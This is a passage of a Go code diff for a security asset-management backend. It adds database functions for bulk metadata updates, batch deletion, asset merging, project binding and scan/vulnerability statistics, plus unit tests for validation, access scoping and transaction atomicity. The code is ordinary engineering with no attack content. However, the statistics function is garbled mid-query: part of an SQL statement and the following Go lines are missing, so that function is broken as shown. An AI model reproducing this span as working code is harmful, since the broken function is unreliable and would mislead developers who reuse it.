a.Protocol, a.Title, a.Server, a.Country, a.Province, a.City, + a.ResponsiblePerson, a.Department, a.BusinessSystem, a.Environment, a.Criticality, a.Source, a.SourceQuery, a.Status, string(tags), time.Now()}, args...)...) + if err != nil { + return err + } + n, _ := res.RowsAffected() + if n == 0 { + return sql.ErrNoRows + } + return nil +} + +type AssetBulkPatch struct { + Status *string + ResponsiblePerson *string + Department *string + BusinessSystem *string + Environment *string + Criticality *string + AddTags []string + RemoveTags []string +} + +func normalizeAssetIDs(ids []string) []string { + unique := make([]string, 0, len(ids)) + seen := make(map[string]struct{}, len(ids)) + for _, id := range ids { + id = strings.TrimSpace(id) + if id == "" { + continue + } + if _, exists := seen[id]; exists { + continue + } + seen[id] = struct{}{} + unique = append(unique, id) + } + return unique +} + +func normalizeBulkTags(tags []string) ([]string, error) { + seen := map[string]struct{}{} + result := make([]string, 0, len(tags)) + for _, tag := range tags { + tag = strings.TrimSpace(tag) + if tag == "" { + continue + } + if utf8.RuneCountInString(tag) > 64 { + return nil, assetValidationErrorf("单个标签不能超过 64 个字符") + } + if _, exists := seen[tag]; exists { + continue + } + seen[tag] = struct{}{} + result = append(result, tag) + } + return result, nil +} + +// UpdateAssetsBulk atomically applies operational metadata to a selected set. +func (db *DB) UpdateAssetsBulk(ids []string, patch AssetBulkPatch, access RBACListAccess) (int, error) { + unique := normalizeAssetIDs(ids) + if len(unique) == 0 { + return 0, fmt.Errorf("资产列表不能为空") + } + if patch.Status != nil { + value := strings.ToLower(strings.TrimSpace(*patch.Status)) + if value != "active" && value != "inactive" { + return 0, assetValidationErrorf("资产状态必须为 active 或 inactive") + } + patch.Status = &value + } + if patch.Environment != nil { + value := strings.ToLower(strings.TrimSpace(*patch.Environment)) + if !oneOfAssetValue(value, "", "production", "staging", "testing", "development", "other") { + return 0, assetValidationErrorf("环境值无效") + } + patch.Environment = &value + } + if patch.Criticality != nil { + value := strings.ToLower(strings.TrimSpace(*patch.Criticality)) + if !oneOfAssetValue(value, "", "critical", "high", "medium", "low") { + return 0, assetValidationErrorf("重要性值无效") + } + patch.Criticality = &value + } + var err error + if patch.AddTags, err = normalizeBulkTags(patch.AddTags); err != nil { + return 0, err + } + if patch.RemoveTags, err = normalizeBulkTags(patch.RemoveTags); err != nil { + return 0, err + } + + tx, err := db.Begin() + if err != nil { + return 0, err + } + defer tx.Rollback() + placeholders := strings.TrimSuffix(strings.Repeat("?,", len(unique)), ",") + idArgs := make([]interface{}, len(unique)) + for i, id := range unique { + idArgs[i] = id + } + countQuery, countArgs := appendAssetAccess("SELECT COUNT(*) FROM assets WHERE id IN ("+placeholders+")", idArgs, access, "assets") + var accessible int + if err := tx.QueryRow(countQuery, countArgs...).Scan(&accessible); err != nil { + return 0, err + } + if accessible != len(unique) { + return 0, fmt.Errorf("部分资产不存在或无权更新") + } + + for _, id := range unique { + var rawTags string + if err := tx.QueryRow("SELECT tags_json FROM assets WHERE id=?", id).Scan(&rawTags); err != nil { + return 0, err + } + tags := []string{} + _ = json.Unmarshal([]byte(rawTags), &tags) + remove := map[string]struct{}{} + for _, tag := range patch.RemoveTags { + remove[tag] = struct{}{} + } + merged := make([]string, 0, len(tags)+len(patch.AddTags)) + seen := map[string]struct{}{} + for _, tag := range append(tags, patch.AddTags...) { + if _, removed := remove[tag]; removed { + continue + } + if _, exists := seen[tag]; exists { + continue + } + seen[tag] = struct{}{} + merged = append(merged, tag) + } + if len(merged) > 30 { + return 0, assetValidationErrorf("批量修改后标签不能超过 30 个") + } + tagsJSON, _ := json.Marshal(merged) + _, err := tx.Exec(`UPDATE assets SET + status=CASE WHEN ? THEN ? ELSE status END, + responsible_person=CASE WHEN ? THEN ? ELSE responsible_person END, + department=CASE WHEN ? THEN ? ELSE department END, + business_system=CASE WHEN ? THEN ? ELSE business_system END, + environment=CASE WHEN ? THEN ? ELSE environment END, + criticality=CASE WHEN ? THEN ? ELSE criticality END, + tags_json=?,updated_at=? WHERE id=?`, + patch.Status != nil, valueOrEmpty(patch.Status), + patch.ResponsiblePerson != nil, valueOrEmpty(patch.ResponsiblePerson), + patch.Department != nil, valueOrEmpty(patch.Department), + patch.BusinessSystem != nil, valueOrEmpty(patch.BusinessSystem), + patch.Environment != nil, valueOrEmpty(patch.Environment), + patch.Criticality != nil, valueOrEmpty(patch.Criticality), + string(tagsJSON), time.Now(), id) + if err != nil { + return 0, err + } + } + if err := tx.Commit(); err != nil { + return 0, err + } + return len(unique), nil +} + +func valueOrEmpty(value *string) string { + if value == nil { + return "" + } + return strings.TrimSpace(*value) +} + +func (db *DB) DeleteAssets(ids []string, access RBACListAccess) (int, error) { + unique := normalizeAssetIDs(ids) + if len(unique) == 0 { + return 0, fmt.Errorf("资产列表不能为空") + } + tx, err := db.Begin() + if err != nil { + return 0, err + } + defer tx.Rollback() + placeholders := strings.TrimSuffix(strings.Repeat("?,", len(unique)), ",") + args := make([]interface{}, len(unique)) + for i, id := range unique { + args[i] = id + } + countQuery, countArgs := appendAssetAccess("SELECT COUNT(*) FROM assets WHERE id IN ("+placeholders+")", args, access, "assets") + var accessible int + if err := tx.QueryRow(countQuery, countArgs...).Scan(&accessible); err != nil { + return 0, err + } + if accessible != len(unique) { + return 0, fmt.Errorf("部分资产不存在或无权删除") + } + deleteQuery, deleteArgs := appendAssetAccess("DELETE FROM assets WHERE id IN ("+placeholders+")", args, access, "assets") + result, err := tx.Exec(deleteQuery, deleteArgs...) + if err != nil { + return 0, err + } + deleted, err := result.RowsAffected() + if err != nil || int(deleted) != len(unique) { + return 0, fmt.Errorf("批量删除资产失败") + } + if err := tx.Commit(); err != nil { + return 0, err + } + return int(deleted), nil +} + +// MergeAssets atomically updates the surviving asset and removes duplicates. +// Separate access scopes preserve permission-specific RBAC boundaries. +func (db *DB) MergeAssets(primary *Asset, duplicateIDs []string, writeAccess, deleteAccess RBACListAccess) (int, error) { + if primary == nil || strings.TrimSpace(primary.ID) == "" { + return 0, fmt.Errorf("主资产不能为空") + } + normalizeAsset(primary) + if err := validateAsset(primary); err != nil { + return 0, err + } + duplicates := normalizeAssetIDs(duplicateIDs) + filtered := duplicates[:0] + for _, id := range duplicates { + if id != primary.ID { + filtered = append(filtered, id) + } + } + duplicates = filtered + if len(duplicates) == 0 { + return 0, fmt.Errorf("重复资产列表不能为空") + } + key := assetDedupKey(primary) + tagsJSON, _ := json.Marshal(primary.Tags) + + tx, err := db.Begin() + if err != nil { + return 0, err + } + defer tx.Rollback() + primaryQuery, primaryArgs := appendAssetAccess("SELECT COUNT(*) FROM assets WHERE id=?", []interface{}{primary.ID}, writeAccess, "assets") + var primaryCount int + if err := tx.QueryRow(primaryQuery, primaryArgs...).Scan(&primaryCount); err != nil || primaryCount != 1 { + return 0, fmt.Errorf("主资产不存在或无权更新") + } + placeholders := strings.TrimSuffix(strings.Repeat("?,", len(duplicates)), ",") + deleteArgs := make([]interface{}, len(duplicates)) + for i, id := range duplicates { + deleteArgs[i] = id + } + countQuery, countArgs := appendAssetAccess("SELECT COUNT(*) FROM assets WHERE id IN ("+placeholders+")", deleteArgs, deleteAccess, "assets") + var accessible int + if err := tx.QueryRow(countQuery, countArgs...).Scan(&accessible); err != nil || accessible != len(duplicates) { + return 0, fmt.Errorf("部分重复资产不存在或无权删除") + } + deleteQuery, scopedDeleteArgs := appendAssetAccess("DELETE FROM assets WHERE id IN ("+placeholders+")", deleteArgs, deleteAccess, "assets") + if result, err := tx.Exec(deleteQuery, scopedDeleteArgs...); err != nil { + return 0, err + } else if deleted, _ := result.RowsAffected(); int(deleted) != len(duplicates) { + return 0, fmt.Errorf("删除重复资产失败") + } + updateQuery, updateScopeArgs := appendAssetAccess(`UPDATE assets SET dedup_key=?,project_id=?,host=?,ip=?,port=?,domain=?,protocol=?,title=?,server=?,country=?,province=?,city=?, + responsible_person=?,department=?,business_system=?,environment=?,criticality=?,source=?,source_query=?,status=?,tags_json=?,updated_at=? WHERE id=?`, + []interface{}{key, nullIfEmpty(primary.ProjectID), primary.Host, primary.IP, primary.Port, primary.Domain, primary.Protocol, primary.Title, primary.Server, + primary.Country, primary.Province, primary.City, primary.ResponsiblePerson, primary.Department, primary.BusinessSystem, primary.Environment, + primary.Criticality, primary.Source, primary.SourceQuery, primary.Status, string(tagsJSON), time.Now(), primary.ID}, writeAccess, "assets") + result, err := tx.Exec(updateQuery, updateScopeArgs...) + if err != nil { + return 0, err + } + if updated, _ := result.RowsAffected(); updated != 1 { + return 0, fmt.Errorf("更新主资产失败") + } + if err := tx.Commit(); err != nil { + return 0, err + } + return len(duplicates), nil +} + +// UpdateAssetsProject atomically replaces the project binding for every asset. +// It refuses the whole update when any requested asset is missing or outside +// the caller's access scope, so a bulk action can never partially succeed. +func (db *DB) UpdateAssetsProject(ids []string, projectID string, access RBACListAccess) (int, error) { + unique := normalizeAssetIDs(ids) + if len(unique) == 0 { + return 0, fmt.Errorf("资产列表不能为空") + } + + tx, err := db.Begin() + if err != nil { + return 0, err + } + defer tx.Rollback() + + placeholders := strings.TrimSuffix(strings.Repeat("?,", len(unique)), ",") + idArgs := make([]interface{}, len(unique)) + for i, id := range unique { + idArgs[i] = id + } + countQuery, countArgs := appendAssetAccess("SELECT COUNT(*) FROM assets WHERE id IN ("+placeholders+")", idArgs, access, "assets") + var accessible int + if err := tx.QueryRow(countQuery, countArgs...).Scan(&accessible); err != nil { + return 0, err + } + if accessible != len(unique) { + return 0, fmt.Errorf("部分资产不存在或无权更新") + } + + updateArgs := []interface{}{nullIfEmpty(strings.TrimSpace(projectID)), time.Now()} + updateArgs = append(updateArgs, idArgs...) + updateQuery, updateArgs := appendAssetAccess("UPDATE assets SET project_id=?,updated_at=? WHERE id IN ("+placeholders+")", updateArgs, access, "assets") + result, err := tx.Exec(updateQuery, updateArgs...) + if err != nil { + return 0, err + } + updated, err := result.RowsAffected() + if err != nil { + return 0, err + } + if int(updated) != len(unique) { + return 0, fmt.Errorf("批量更新资产失败") + } + if err := tx.Commit(); err != nil { + return 0, err + } + return int(updated), nil +} + +func (db *DB) DeleteAsset(id string, access RBACListAccess) error { + where, args := appendAssetAccess(" WHERE id = ?", []interface{}{id}, access, "assets") + res, err := db.Exec("DELETE FROM assets"+where, args...) + if err != nil { + return err + } + n, _ := res.RowsAffected() + if n == 0 { + return sql.ErrNoRows + } + return nil +} + +func (db *DB) GetAssetStats(access RBACListAccess, requestedDays ...int) (map[string]interface{}, error) { + days := 30 + if len(requestedDays) > 0 && (requestedDays[0] == 7 || requestedDays[0] == 30 || requestedDays[0] == 90) { + days = requestedDays[0] + } + where, args := appendAssetAccess(" WHERE 1=1", nil, access, "assets") + stats := map[string]interface{}{} + row := db.QueryRow(`SELECT COUNT(*),COUNT(DISTINCT NULLIF(ip,'')),COUNT(DISTINCT NULLIF(domain,'')), + COUNT(DISTINCT CASE WHEN port>0 THEN CAST(port AS TEXT) END), + COALESCE(SUM(CASE WHEN datetime(last_seen_at)>=datetime('now','-7 days') THEN 1 ELSE 0 END),0) FROM assets`+where, args...) + var total, ips, domains, ports, recent int + if err := row.Scan(&total, &ips, &domains, &ports, &recent); err != nil { + return nil, err + } + stats["total"], stats["ips"], stats["domains"], stats["ports"], stats["recent"] = total, ips, domains, ports, recent + rows, err := db.Query(`SELECT CASE WHEN protocol='' THEN 'unknown' ELSE protocol END,COUNT(*) FROM assets`+where+` GROUP BY protocol ORDER BY COUNT(*) DESC LIMIT 8`, args...) + if err != nil { + return nil, err + } + defer rows.Close() + dist := []map[string]interface{}{} + for rows.Next() { + var name string + var count int + if err := rows.Scan(&name, &count); err != nil { + return nil, err + } + dist = append(dist, map[string]interface{}{"name": name, "count": count}) + } + stats["protocols"] = dist + stats["period_days"] = days + + coverage := map[string]interface{}{} + coverageRow := db.QueryRow(`SELECT + COALESCE(SUM(CASE WHEN last_scan_at IS NOT NULL THEN 1 ELSE 0 END),0), + COALESCE(SUM(CASE WHEN datetime(last_scan_at)>=datetime('now','-7 days') THEN 1 ELSE 0 END),0), + COALESCE(SUM(CASE WHEN datetime(last_scan_at)>=datetime('now','-30 days') THEN 1 ELSE 0 END),0), + COALESCE(SUM(CASE WHEN last_scan_at IS NULL THEN 1 ELSE 0 END),0), + COALESCE(SUM(CASE WHEN last_scan_at IS NOT NULL AND datetime(last_scan_at) 0 { + coverage["rate"] = int(float64(scanned) / float64(total) * 100) + coverage["recent_rate"] = int(float64(scanned30) / float64(total) * 100) + } else { + coverage["rate"], coverage["recent_rate"] = 0, 0 + } + stats["coverage"] = coverage + + assetDaily := map[string]map[string]int{} + trendWhere, trendArgs := appendAssetAccess(" WHERE datetime(first_seen_at)>=datetime('now',?)", []interface{}{fmt.Sprintf("-%d days", days-1)}, access, "assets") + trendRows, err := db.Query(`SELECT date(first_seen_at), COUNT(*) + FROM assets`+trendWhere+` GROUP BY date(first_seen_at) ORDER BY date(first_seen_at)`, trendArgs...) + if err != nil { + return nil, err + } + for trendRows.Next() { + var day string + var added int + if err := trendRows.Scan(&day, &added); err != nil { + trendRows.Close() + return nil, err + } + assetDaily[day] = map[string]int{"added": added, "inactive": 0} + } + if err := trendRows.Close(); err != nil { + return nil, err + } + inactiveWhere, inactiveArgs := appendAssetAccess(" WHERE status='inactive' AND datetime(updated_at)>=datetime('now',?)", []interface{}{fmt.Sprintf("-%d days", days-1)}, access, "assets") + inactiveRows, err := db.Query(`SELECT date(updated_at), COUNT(*) FROM assets`+inactiveWhere+` GROUP BY date(updated_at) ORDER BY date(updated_at)`, inactiveArgs...) + if err != nil { + return nil, err + } + for inactiveRows.Next() { + var day string + var inactive int + if err := inactiveRows.Scan(&day, &inactive); err != nil { + inactiveRows.Close() + return nil, err + } + if _, ok := assetDaily[day]; !ok { + assetDaily[day] = map[string]int{"added": 0, "inactive": 0} + } + assetDaily[day]["inactive"] = inactive + } + if err := inactiveRows.Close(); err != nil { + return nil, err + } + + riskDaily := map[string]map[string]int{} + riskWhere, riskArgs := appendVulnerabilityAccessFilter(" WHERE datetime(created_at)>=datetime('now',?)", []interface{}{fmt.Sprintf("-%d days", days-1)}, access) + riskRows, err := db.Query(`SELECT date(created_at), COUNT(*), + COALESCE(SUM(CASE WHEN LOWER(severity) IN ('critical','high') THEN 1 ELSE 0 END),0) + FROM vulnerabilities`+riskWhere+` GROUP BY date(created_at) ORDER BY date(created_at)`, riskArgs...) + if err != nil { + return nil, err + } + for riskRows.Next() { + var day string + var discovered, highRisk int + if err := riskRows.Scan(&day, &discovered, &highRisk); err != nil { + riskRows.Close() + return nil, err + } + riskDaily[day] = map[string]int{"discovered": discovered, "high_risk": highRisk} + } + if err := riskRows.Close(); err != nil { + return nil, err + } + + assetTrend := make([]map[string]interface{}, 0, days) + riskTrend := make([]map[string]interface{}, 0, days) + start := time.Now().UTC().Truncate(24*time.Hour).AddDate(0, 0, -(days - 1)) + for i := 0; i < days; i++ { + day := start.AddDate(0, 0, i).Format("2006-01-02") + assetPoint := map[string]interface{}{"date": day, "added": 0, "inactive": 0} + if values, ok := assetDaily[day]; ok { + assetPoint["added"], assetPoint["inactive"] = values["added"], values["inactive"] + } + assetTrend = append(assetTrend, assetPoint) + riskPoint := map[string]interface{}{"date": day, "discovered": 0, "high_risk": 0} + if values, ok := riskDaily[day]; ok { + riskPoint["discovered"], riskPoint["high_risk"] = values["discovered"], values["high_risk"] + } + riskTrend = append(riskTrend, riskPoint) + } + stats["asset_trend"], stats["risk_trend"] = assetTrend, riskTrend + return stats, rows.Err() +} diff --git a/internal/database/asset_test.go b/internal/database/asset_test.go new file mode 100644 index 00000000..b9418d9b --- /dev/null +++ b/internal/database/asset_test.go @@ -0,0 +1,449 @@ +package database + +import ( + "path/filepath" + "strconv" + "strings" + "testing" + "time" + + "go.uber.org/zap" +) + +func TestAssetURLNormalizationAndValidation(t *testing.T) { + db, err := NewDB(filepath.Join(t.TempDir(), "asset-validation.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + asset := &Asset{Host: "https://例子.测试/path", Tags: []string{" prod ", "prod"}} + result, err := db.UpsertAssets([]*Asset{asset}, "") + if err != nil || result.Created != 1 { + t.Fatalf("URL asset was not created: result=%#v err=%v", result, err) + } + if asset.Domain != "xn--fsqu00a.xn--0zwm56d" || asset.Protocol != "https" || asset.Port != 443 { + t.Fatalf("URL fields were not normalized: %#v", asset) + } + if len(asset.Tags) != 1 || asset.Tags[0] != "prod" { + t.Fatalf("tags were not normalized: %#v", asset.Tags) + } + + invalid := []*Asset{ + {IP: "999.1.1.1", Status: "active"}, + {Domain: "bad_domain.example", Status: "active"}, + {Domain: "example.com", Port: 70000, Status: "active"}, + {Domain: "example.com", Protocol: "HTTP 1.1", Status: "active"}, + {Domain: "example.com", Status: "deleted"}, + } + for _, candidate := range invalid { + if _, err := db.UpsertAssets([]*Asset{candidate}, ""); err == nil { + t.Fatalf("invalid asset unexpectedly accepted: %#v", candidate) + } + } + + for _, host := range []string{"123", "not a formal target", "https://", "https://user:password@example.com"} { + result, err := db.UpsertAssets([]*Asset{{Host: host}}, "") + if err != nil || result.Created != 1 { + t.Fatalf("opaque asset address %q was not accepted: result=%#v err=%v", host, result, err) + } + } +} + +func TestAssetValidationRejectsOversizedTags(t *testing.T) { + db, err := NewDB(filepath.Join(t.TempDir(), "asset-tag-validation.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + _, err = db.UpsertAssets([]*Asset{{Domain: "example.com", Tags: []string{strings.Repeat("x", 65)}}}, "") + if err == nil || !strings.Contains(err.Error(), "标签") { + t.Fatalf("expected tag validation error, got %v", err) + } +} + +func TestFofaAssetIgnoresInvalidOptionalStructuredFields(t *testing.T) { + db, err := NewDB(filepath.Join(t.TempDir(), "fofa-asset-validation.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + asset := &Asset{ + Host: "https://203.0.113.59:8443", + IP: "203.0.113.59", + Domain: "provider_specific_invalid_domain_59", + Port: 8443, + Protocol: "https", + Source: "fofa", + } + result, err := db.UpsertAssets([]*Asset{asset}, "") + if err != nil || result.Created != 1 { + t.Fatalf("FOFA asset with dirty optional domain was not created: result=%#v err=%v", result, err) + } + if asset.Domain != "" || asset.IP != "203.0.113.59" { + t.Fatalf("FOFA structured fields were not sanitized: %#v", asset) + } +} + +func TestAssetUpsertDeduplicatesAndUpdates(t *testing.T) { + db, err := NewDB(filepath.Join(t.TempDir(), "assets.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + first := &Asset{Host: "https://example.com", Domain: "Example.COM", Port: 443, Protocol: "HTTPS", Title: "Old", Source: "fofa"} + result, err := db.UpsertAssets([]*Asset{first}, "user-a") + if err != nil || result.Created != 1 || result.Updated != 0 { + t.Fatalf("first upsert = %#v, %v", result, err) + } + second := &Asset{Domain: "example.com", Port: 443, Protocol: "https", Title: "New", Server: "nginx", Source: "fofa"} + result, err = db.UpsertAssets([]*Asset{second}, "user-a") + if err != nil || result.Created != 0 || result.Updated != 1 { + t.Fatalf("second upsert = %#v, %v", result, err) + } + assets, total, err := db.ListAssets(20, 0, AssetListFilter{}, RBACListAccess{Scope: RBACScopeAll}) + if err != nil || total != 1 || len(assets) != 1 { + t.Fatalf("list assets total=%d len=%d err=%v", total, len(assets), err) + } + if assets[0].Title != "New" || assets[0].Server != "nginx" || assets[0].Protocol != "https" { + t.Fatalf("asset not refreshed: %#v", assets[0]) + } + stats, err := db.GetAssetStats(RBACListAccess{Scope: RBACScopeAll}) + if err != nil || stats["total"] != 1 { + t.Fatalf("stats=%#v err=%v", stats, err) + } + coverage, ok := stats["coverage"].(map[string]interface{}) + if !ok || coverage["never_scanned"] != 1 || coverage["rate"] != 0 { + t.Fatalf("coverage=%#v", stats["coverage"]) + } + assetTrend, ok := stats["asset_trend"].([]map[string]interface{}) + if !ok || len(assetTrend) != 30 { + t.Fatalf("asset trend=%#v", stats["asset_trend"]) + } + riskTrend, ok := stats["risk_trend"].([]map[string]interface{}) + if !ok || len(riskTrend) != 30 { + t.Fatalf("risk trend=%#v", stats["risk_trend"]) + } +} + +func TestAssetAccessFiltersOwners(t *testing.T) { + db, err := NewDB(filepath.Join(t.TempDir(), "assets-access.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + now := time.Now() + if _, err := db.Exec(`INSERT INTO rbac_users (id,username,display_name,password_hash,enabled,is_builtin,created_at,updated_at) VALUES ('user-a','user-a','User A','hash',1,0,?,?)`, now, now); err != nil { + t.Fatal(err) + } + if _, err := db.UpsertAssets([]*Asset{{IP: "10.0.0.1", Port: 80, Protocol: "http"}}, "user-a"); err != nil { + t.Fatal(err) + } + _, total, err := db.ListAssets(20, 0, AssetListFilter{}, RBACListAccess{UserID: "user-b", Scope: RBACScopeAssigned}) + if err != nil || total != 0 { + t.Fatalf("unexpected cross-user assets: total=%d err=%v", total, err) + } + _, total, err = db.ListAssets(20, 0, AssetListFilter{}, RBACListAccess{UserID: "user-a", Scope: RBACScopeOwn}) + if err != nil || total != 1 { + t.Fatalf("owner cannot list asset: total=%d err=%v", total, err) + } + assets, _, err := db.ListAssets(1, 0, AssetListFilter{}, RBACListAccess{UserID: "user-a", Scope: RBACScopeAssigned}) + if err != nil || len(assets) != 1 || !db.UserCanAccessResource("user-a", RBACScopeAssigned, "asset", assets[0].ID) { + t.Fatalf("creator assignment missing: assets=%d err=%v", len(assets), err) + } + options, err := db.ListAssignableRBACResources("asset", "10.0.0.1", 10) + if err != nil || len(options) != 1 { + t.Fatalf("asset resource picker: options=%#v err=%v", options, err) + } + project, err := db.CreateProject(&Project{Name: "Alpha", Status: "active"}) + if err != nil { + t.Fatal(err) + } + if err := db.SetResourceOwner("project", project.ID, "user-b"); err != nil { + t.Fatal(err) + } + asset := assets[0] + asset.ProjectID = project.ID + if err := db.UpdateAsset(asset.ID, asset, RBACListAccess{Scope: RBACScopeAll}); err != nil { + t.Fatal(err) + } + projectAssets, total, err := db.ListAssets(20, 0, AssetListFilter{ProjectID: project.ID}, RBACListAccess{UserID: "user-b", Scope: RBACScopeOwn}) + if err != nil || total != 1 || len(projectAssets) != 1 || projectAssets[0].ProjectName != "Alpha" { + t.Fatalf("project-bound asset access failed: total=%d assets=%#v err=%v", total, projectAssets, err) + } + if !db.UserCanAccessResource("user-b", RBACScopeOwn, "asset", asset.ID) { + t.Fatal("project owner cannot access bound asset") + } +} + +func TestUpdateAssetsProjectIsAtomicAndScoped(t *testing.T) { + db, err := NewDB(filepath.Join(t.TempDir(), "asset-batch-project.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + project, err := db.CreateProject(&Project{Name: "Batch Project", Status: "active"}) + if err != nil { + t.Fatal(err) + } + if _, err := db.UpsertAssets([]*Asset{ + {IP: "192.0.2.1", Port: 80, Protocol: "http"}, + {IP: "192.0.2.2", Port: 443, Protocol: "https"}, + }, "owner-a"); err != nil { + t.Fatal(err) + } + assets, _, err := db.ListAssets(10, 0, AssetListFilter{}, RBACListAccess{Scope: RBACScopeAll}) + if err != nil || len(assets) != 2 { + t.Fatalf("list assets: len=%d err=%v", len(assets), err) + } + ids := []string{assets[0].ID, assets[1].ID} + updated, err := db.UpdateAssetsProject(ids, project.ID, RBACListAccess{UserID: "owner-a", Scope: RBACScopeOwn}) + if err != nil || updated != 2 { + t.Fatalf("batch bind: updated=%d err=%v", updated, err) + } + for _, id := range ids { + asset, err := db.GetAsset(id, RBACListAccess{Scope: RBACScopeAll}) + if err != nil || asset.ProjectID != project.ID { + t.Fatalf("asset %s was not bound: asset=%#v err=%v", id, asset, err) + } + } + + if _, err := db.UpdateAssetsProject([]string{ids[0], "missing"}, "", RBACListAccess{Scope: RBACScopeAll}); err == nil { + t.Fatal("partial batch update unexpectedly succeeded") + } + asset, err := db.GetAsset(ids[0], RBACListAccess{Scope: RBACScopeAll}) + if err != nil || asset.ProjectID != project.ID { + t.Fatalf("failed batch changed an asset: asset=%#v err=%v", asset, err) + } + + updated, err = db.UpdateAssetsProject(ids, "", RBACListAccess{Scope: RBACScopeAll}) + if err != nil || updated != 2 { + t.Fatalf("batch unbind: updated=%d err=%v", updated, err) + } +} + +func TestAssetAdvancedFiltersAndBulkMetadata(t *testing.T) { + db, err := NewDB(filepath.Join(t.TempDir(), "asset-advanced.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + project, err := db.CreateProject(&Project{Name: "Production", Status: "active"}) + if err != nil { + t.Fatal(err) + } + input := []*Asset{ + {ProjectID: project.ID, Domain: "critical.example.com", Port: 443, Protocol: "https", Country: "CN", ResponsiblePerson: "Alice", Department: "Security", BusinessSystem: "Portal", Environment: "production", Criticality: "critical", Tags: []string{"internet"}}, + {ProjectID: project.ID, Domain: "dev.example.com", Port: 8080, Protocol: "http", Country: "US", Environment: "development", Criticality: "low"}, + } + if result, err := db.UpsertAssets(input, "", true); err != nil || result.Created != 2 { + t.Fatalf("create assets: result=%#v err=%v", result, err) + } + conversation, err := db.CreateConversation("critical scan", ConversationCreateMeta{}) + if err != nil { + t.Fatal(err) + } + if err := db.MarkAssetScanned(input[0].ID, conversation.ID, "", "", RBACListAccess{Scope: RBACScopeAll}); err != nil { + t.Fatal(err) + } + if _, err := db.CreateVulnerability(&Vulnerability{ConversationID: conversation.ID, Title: "critical finding", Severity: "critical", Target: input[0].Domain}); err != nil { + t.Fatal(err) + } + + minVulns := 1 + items, total, err := db.ListAssets(20, 0, AssetListFilter{ + Status: "active", RiskLevel: "critical", MinVulnerabilities: &minVulns, + Country: "cn", Environment: "production", Criticality: "critical", + SortBy: "vulnerability_count", SortOrder: "desc", + }, RBACListAccess{Scope: RBACScopeAll}) + if err != nil || total != 1 || len(items) != 1 { + t.Fatalf("advanced query: total=%d items=%#v err=%v", total, items, err) + } + if items[0].ResponsiblePerson != "Alice" || items[0].BusinessSystem != "Portal" || items[0].VulnerabilityCount != 1 { + t.Fatalf("metadata did not round-trip: %#v", items[0]) + } + + status := "inactive" + owner := "Bob" + environment := "staging" + updated, err := db.UpdateAssetsBulk([]string{input[0].ID, input[1].ID}, AssetBulkPatch{ + Status: &status, ResponsiblePerson: &owner, Environment: &environment, + AddTags: []string{"review"}, RemoveTags: []string{"internet"}, + }, RBACListAccess{Scope: RBACScopeAll}) + if err != nil || updated != 2 { + t.Fatalf("bulk update: updated=%d err=%v", updated, err) + } + for _, id := range []string{input[0].ID, input[1].ID} { + item, err := db.GetAsset(id, RBACListAccess{Scope: RBACScopeAll}) + if err != nil { + t.Fatal(err) + } + if item.Status != "inactive" || item.ResponsiblePerson != "Bob" || item.Environment != "staging" || len(item.Tags) != 1 || item.Tags[0] != "review" { + t.Fatalf("unexpected bulk metadata: %#v", item) + } + } +} + +func TestListAssetsForOperationAndBatchDelete(t *testing.T) { + db, err := NewDB(filepath.Join(t.TempDir(), "asset-selection.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + for i := 1; i <= 3; i++ { + if _, err := db.UpsertAssets([]*Asset{{IP: "198.51.100." + strconv.Itoa(i), Port: 443, Protocol: "https", Tags: []string{"selected"}}}, "", true); err != nil { + t.Fatal(err) + } + } + items, total, err := db.ListAssetsForOperation(10, AssetListFilter{Tag: "selected"}, RBACListAccess{Scope: RBACScopeAll}) + if err != nil || total != 3 || len(items) != 3 { + t.Fatalf("selection: total=%d len=%d err=%v", total, len(items), err) + } + ids := make([]string, 0, len(items)) + for _, item := range items { + ids = append(ids, item.ID) + } + deleted, err := db.DeleteAssets(ids, RBACListAccess{Scope: RBACScopeAll}) + if err != nil || deleted != 3 { + t.Fatalf("batch delete: deleted=%d err=%v", deleted, err) + } +} + +func TestMergeAssetsIsAtomic(t *testing.T) { + db, err := NewDB(filepath.Join(t.TempDir(), "asset-merge.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + input := []*Asset{ + {Domain: "merge.example.com", Port: 80, Protocol: "http", Title: "Primary", Tags: []string{"one"}}, + {Domain: "merge.example.com", Port: 443, Protocol: "https", ResponsiblePerson: "Alice", Tags: []string{"two"}}, + } + if _, err := db.UpsertAssets(input, "", true); err != nil { + t.Fatal(err) + } + primary, err := db.GetAsset(input[0].ID, RBACListAccess{Scope: RBACScopeAll}) + if err != nil { + t.Fatal(err) + } + primary.ResponsiblePerson = "Alice" + primary.Tags = []string{"one", "two"} + merged, err := db.MergeAssets(primary, []string{input[1].ID}, RBACListAccess{Scope: RBACScopeAll}, RBACListAccess{Scope: RBACScopeAll}) + if err != nil || merged != 1 { + t.Fatalf("merge: merged=%d err=%v", merged, err) + } + items, total, err := db.ListAssets(10, 0, AssetListFilter{}, RBACListAccess{Scope: RBACScopeAll}) + if err != nil || total != 1 || len(items) != 1 || items[0].ResponsiblePerson != "Alice" || len(items[0].Tags) != 2 { + t.Fatalf("unexpected merged asset: total=%d items=%#v err=%v", total, items, err) + } + + before := items[0].Title + items[0].Title = "Must roll back" + if _, err := db.MergeAssets(items[0], []string{"missing"}, RBACListAccess{Scope: RBACScopeAll}, RBACListAccess{Scope: RBACScopeAll}); err == nil { + t.Fatal("merge with missing duplicate unexpectedly succeeded") + } + after, err := db.GetAsset(items[0].ID, RBACListAccess{Scope: RBACScopeAll}) + if err != nil || after.Title != before { + t.Fatalf("failed merge was not atomic: asset=%#v err=%v", after, err) + } +} + +func TestAssetScanLinkReturnsTimeAndRelatedVulnerabilities(t *testing.T) { + db, err := NewDB(filepath.Join(t.TempDir(), "asset-scan.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + if _, err := db.UpsertAssets([]*Asset{{IP: "192.0.2.10", Port: 443, Protocol: "https"}}, ""); err != nil { + t.Fatal(err) + } + assets, _, err := 